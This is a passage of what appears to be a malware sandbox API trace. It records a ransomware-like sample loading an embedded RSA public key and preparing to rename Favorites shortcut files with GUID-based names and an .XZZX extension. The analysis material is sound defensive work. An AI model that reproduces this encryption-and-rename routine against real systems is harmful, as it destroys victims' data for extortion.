PUBLIC KEY-----" [0137.599] lstrcpyW (in: lpString1=0x420f460, lpString2="MSN Entertainment.url" | out: lpString1="MSN Entertainment.url") returned="MSN Entertainment.url" [0137.599] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0137.599] SetErrorMode (uMode=0x1) returned 0x1 [0137.599] lstrcpyW (in: lpString1=0x420f860, lpString2="MSN Entertainment.url" | out: lpString1="MSN Entertainment.url") returned="MSN Entertainment.url" [0137.599] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xf60a488d, Data2=0x15d8, Data3=0x4fa7, Data4=([0]=0xb6, [1]=0xb0, [2]=0x9a, [3]=0x48, [4]=0x70, [5]=0x12, [6]=0xc, [7]=0xf))) returned 0x0 [0137.599] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0137.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0137.599] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\70A0C7F806CBE7E8F60A488D0AECCC30.XZZX") returned 81 [0137.599] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="XZZX") returned 0x0 [0137.599] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url", dwFileAttributes=0x20) returned 0 [0137.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 482 os_tid = 0xae0 [0137.755] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0137.755] lstrcpyW (in: lpString1=0x420f460, lpString2="MSN Money.url" | out: lpString1="MSN Money.url") returned="MSN Money.url" [0137.755] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0137.755] SetErrorMode (uMode=0x1) returned 0x1 [0137.755] lstrcpyW (in: lpString1=0x420f860, lpString2="MSN Money.url" | out: lpString1="MSN Money.url") returned="MSN Money.url" [0137.755] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xfb9d7df5, Data2=0x1224, Data3=0x4ec7, Data4=([0]=0xba, [1]=0xf3, [2]=0x8f, [3]=0x2d, [4]=0xd4, [5]=0x82, [6]=0xf7, [7]=0xf7))) returned 0x0 [0137.755] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0137.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0137.755] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\7500F074059511FCFB9D7DF509B5F644.XZZX") returned 81 [0137.755] StrStrW (lpFirst="MSN Money.url", lpSrch="XZZX") returned 0x0 [0137.755] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url", dwFileAttributes=0x20) returned 0 [0137.756] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 483 os_tid = 0xae4 [0137.910] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0137.910] lstrcpyW (in: lpString1=0x420f460, lpString2="MSN Sports.url" | out: lpString1="MSN Sports.url") returned="MSN Sports.url" [0137.910] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0137.910] SetErrorMode (uMode=0x1) returned 0x1 [0137.910] lstrcpyW (in: lpString1=0x420f860, lpString2="MSN Sports.url" | out: lpString1="MSN Sports.url") returned="MSN Sports.url" [0137.910] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xdeb5127f, Data2=0x5a9d, Data3=0x4a76, Data4=([0]=0xac, [1]=0xa7, [2]=0x93, [3]=0xa7, [4]=0x9d, [5]=0xa8, [6]=0xef, [7]=0x91))) returned 0x0 [0137.910] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0137.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0137.910] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\3D8CFDE31A5B265EDEB5127F1E7C0AA6.XZZX") returned 81 [0137.910] StrStrW (lpFirst="MSN Sports.url", lpSrch="XZZX") returned 0x0 [0137.910] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url", dwFileAttributes=0x20) returned 0 [0137.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 484 os_tid = 0xae8 [0138.067] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0138.067] lstrcpyW (in: lpString1=0x420f460, lpString2="MSN.url" | out: lpString1="MSN.url") returned="MSN.url" [0138.067] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0138.067] SetErrorMode (uMode=0x1) returned 0x1 [0138.067] lstrcpyW (in: lpString1=0x420f860, lpString2="MSN.url" | out: lpString1="MSN.url") returned="MSN.url" [0138.067] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x797b313b, Data2=0x2681, Data3=0x49f2, Data4=([0]=0xb4, [1]=0x24, [2]=0x52, [3]=0x5b, [4]=0x82, [5]=0xa5, [6]=0xd, [7]=0xd0))) returned 0x0 [0138.067] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0138.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0138.067] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\806290BB0B1F2EF2797B313B0F40133A.XZZX") returned 81 [0138.067] StrStrW (lpFirst="MSN.url", lpSrch="XZZX") returned 0x0 [0138.067] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url", dwFileAttributes=0x20) returned 0 [0138.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 485 os_tid = 0xaec [0138.224] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0138.224] lstrcpyW (in: lpString1=0x420f460, lpString2="MSNBC News.url" | out: lpString1="MSNBC News.url") returned="MSNBC News.url" [0138.224] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0138.224] SetErrorMode (uMode=0x1) returned 0x1 [0138.224] lstrcpyW (in: lpString1=0x420f860, lpString2="MSNBC News.url" | out: lpString1="MSNBC News.url") returned="MSNBC News.url" [0138.224] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xad4f9346, Data2=0xff3c, Data3=0x464d, Data4=([0]=0xaf, [1]=0x38, [2]=0x87, [3]=0x1f, [4]=0x44, [5]=0x66, [6]=0x80, [7]=0x3))) returned 0x0 [0138.224] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0138.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0138.224] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\E2593E6846172D0CAD4F93464A381154.XZZX") returned 81 [0138.224] StrStrW (lpFirst="MSNBC News.url", lpSrch="XZZX") returned 0x0 [0138.224] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url", dwFileAttributes=0x20) returned 0 [0138.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 486 os_tid = 0xaf0 [0138.388] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0138.388] lstrcpyW (in: lpString1=0x420f460, lpString2="Get Windows Live.url" | out: lpString1="Get Windows Live.url") returned="Get Windows Live.url" [0138.388] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0138.388] SetErrorMode (uMode=0x1) returned 0x1 [0138.388] lstrcpyW (in: lpString1=0x420f860, lpString2="Get Windows Live.url" | out: lpString1="Get Windows Live.url") returned="Get Windows Live.url" [0138.388] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x46b1bd37, Data2=0xbfd7, Data3=0x4b26, Data4=([0]=0xb1, [1]=0xa3, [2]=0x5e, [3]=0x56, [4]=0x9f, [5]=0xe6, [6]=0x30, [7]=0x74))) returned 0x0 [0138.388] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0138.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0138.388] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\FB71F231385076EA46B1BD373C715B32.XZZX") returned 81 [0138.388] StrStrW (lpFirst="Get Windows Live.url", lpSrch="XZZX") returned 0x0 [0138.388] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url", dwFileAttributes=0x20) returned 0 [0138.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 487 os_tid = 0xaf4 [0138.535] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0138.535] lstrcpyW (in: lpString1=0x420f460, lpString2="Windows Live Gallery.url" | out: lpString1="Windows Live Gallery.url") returned="Windows Live Gallery.url" [0138.535] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0138.535] SetErrorMode (uMode=0x1) returned 0x1 [0138.535] lstrcpyW (in: lpString1=0x420f860, lpString2="Windows Live Gallery.url" | out: lpString1="Windows Live Gallery.url") returned="Windows Live Gallery.url" [0138.535] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x6c2e30e7, Data2=0x719a, Data3=0x48c7, Data4=([0]=0x91, [1]=0xa3, [2]=0x46, [3]=0x6e, [4]=0xea, [5]=0x68, [6]=0x3a, [7]=0x39))) returned 0x0 [0138.535] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0138.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0138.535] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\775F61F6204B9EB66C2E30E7246C82FE.XZZX") returned 81 [0138.535] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="XZZX") returned 0x0 [0138.535] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url", dwFileAttributes=0x20) returned 0 [0138.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 488 os_tid = 0xaf8 [0138.690] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0138.691] lstrcpyW (in: lpString1=0x420f460, lpString2="Windows Live Mail.url" | out: lpString1="Windows Live Mail.url") returned="Windows Live Mail.url" [0138.691] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0138.691] SetErrorMode (uMode=0x1) returned 0x1 [0138.691] lstrcpyW (in: lpString1=0x420f860, lpString2="Windows Live Mail.url" | out: lpString1="Windows Live Mail.url") returned="Windows Live Mail.url" [0138.691] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xccc768f9, Data2=0x72a0, Data3=0x43c1, Data4=([0]=0xb7, [1]=0x3f, [2]=0x62, [3]=0xe, [4]=0x8c, [5]=0x23, [6]=0x38, [7]=0xd6))) returned 0x0 [0138.691] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0138.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0138.691] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\C9607DA01E564AA0CCC768F922772EE8.XZZX") returned 81 [0138.691] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="XZZX") returned 0x0 [0138.691] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url", dwFileAttributes=0x20) returned 0 [0138.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 489 os_tid = 0xafc [0138.847] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 